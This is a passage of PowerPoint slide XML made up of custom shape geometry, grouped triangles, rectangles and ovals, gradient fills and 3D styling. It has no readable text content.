                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
